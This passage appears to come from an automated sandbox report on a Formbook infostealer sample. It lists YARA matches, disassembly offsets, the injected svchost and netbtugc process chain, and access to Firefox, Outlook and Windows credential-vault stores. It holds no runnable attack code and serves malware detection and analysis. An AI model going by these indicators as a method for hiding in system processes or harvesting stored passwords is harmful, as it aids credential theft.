            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB5BF02_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DBF92_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FB802_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB762_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438E02_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAD8002_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FA3524_2_031FA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032003E64_2_032003E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314E3F04_2_0314E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E02744_2_031E0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031C02C04_2_031C02C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DA1184_2_031DA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031301004_2_03130100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031C81584_2_031C8158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032001AA4_2_032001AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F41A24_2_031F41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F81CC4_2_031F81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031D20004_2_031D2000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031647504_2_03164750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031407704_2_03140770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0313C7C04_2_0313C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315C6E04_2_0315C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031405354_2_03140535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032005914_2_03200591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E44204_2_031E4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F24464_2_031F2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031EE4F64_2_031EE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FAB404_2_031FAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F6BD74_2_031F6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0313EA804_2_0313EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031569624_2_03156962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0320A9A64_2_0320A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031429A04_2_031429A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314A8404_2_0314A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031428404_2_03142840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031268B84_2_031268B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0316E8F04_2_0316E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03160F304_2_03160F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E2F304_2_031E2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03182F284_2_03182F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B4F404_2_031B4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031BEFA04_2_031BEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03132FC84_2_03132FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314CFE04_2_0314CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FEE264_2_031FEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03140E594_2_03140E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03152E904_2_03152E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FCE934_2_031FCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FEEDB4_2_031FEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DCD1F4_2_031DCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314AD004_2_0314AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03158DBF4_2_03158DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0313ADE04_2_0313ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03140C004_2_03140C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E0CB54_2_031E0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03130CF24_2_03130CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F132D4_2_031F132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0312D34C4_2_0312D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0318739A4_2_0318739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031452A04_2_031452A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315B2C04_2_0315B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E12ED4_2_031E12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0320B16B4_2_0320B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0312F1724_2_0312F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317516C4_2_0317516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314B1B04_2_0314B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031EF0CC4_2_031EF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031470C04_2_031470C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F70E94_2_031F70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FF0E04_2_031FF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FF7B04_2_031FF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031856304_2_03185630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F16CC4_2_031F16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F75714_2_031F7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DD5B04_2_031DD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032095C34_2_032095C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FF43F4_2_031FF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031314604_2_03131460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFB764_2_031FFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315FB804_2_0315FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B5BF04_2_031B5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0317DBF94_2_0317DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFA494_2_031FFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F7A464_2_031F7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B3A6C4_2_031B3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DDAAC4_2_031DDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03185AA04_2_03185AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E1AA34_2_031E1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031EDAC64_2_031EDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031D59104_2_031D5910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031499504_2_03149950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315B9504_2_0315B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031AD8004_2_031AD800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031438E04_2_031438E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFF094_2_031FFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03141F924_2_03141F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFFB14_2_031FFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03103FD24_2_03103FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03103FD54_2_03103FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03149EB04_2_03149EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F1D5A4_2_031F1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03143D404_2_03143D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F7D734_2_031F7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315FDC04_2_0315FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031B9C324_2_031B9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FFCF24_2_031FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_025415E04_2_025415E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253C7D04_2_0253C7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253C7C74_2_0253C7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253AA704_2_0253AA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0253C9F04_2_0253C9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_025430F04_2_025430F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_025430EE4_2_025430EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02559FD04_2_02559FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAA0AF4_2_02DAA0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAB8B44_2_02DAB8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAB9D64_2_02DAB9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DAADD84_2_02DAADD8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DABD6C4_2_02DABD6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 278 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0312B970 appears 280 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03175130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 031BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03187E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 031AEA12 appears 86 times
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: String function: 006F0A30 appears 46 times
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: String function: 006EF9F2 appears 40 times
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: String function: 006D9CB3 appears 31 times
            Source: QLLafoDdqv.exe, 00000000.00000003.2119469328.00000000040A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QLLafoDdqv.exe
            Source: QLLafoDdqv.exe, 00000000.00000003.2121982850.000000000424D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QLLafoDdqv.exe
            Source: QLLafoDdqv.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.24d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@18/14
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007437B5 GetLastError,FormatMessageW,0_2_007437B5
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007310BF AdjustTokenPrivileges,CloseHandle,0_2_007310BF
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007316C3
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_007451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007451CD
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0075A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0075A67C
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_0074648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0074648E
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeCode function: 0_2_006D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_006D42A2
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeFile created: C:\Users\user\AppData\Local\Temp\aut1BE0.tmpJump to behavior
            Source: QLLafoDdqv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002B82000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2448891881.0000000002B82000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4567487590.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2448785974.0000000002B62000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4567487590.0000000002B8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: QLLafoDdqv.exeReversingLabs: Detection: 55%
            Source: QLLafoDdqv.exeVirustotal: Detection: 40%
            Source: unknownProcess created: C:\Users\user\Desktop\QLLafoDdqv.exe "C:\Users\user\Desktop\QLLafoDdqv.exe"
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QLLafoDdqv.exe"
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QLLafoDdqv.exe"Jump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\QLLafoDdqv.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: QLLafoDdqv.exeStatic file information: File size 1229824 > 1048576
            Source: QLLafoDdqv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: QLLafoDdqv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
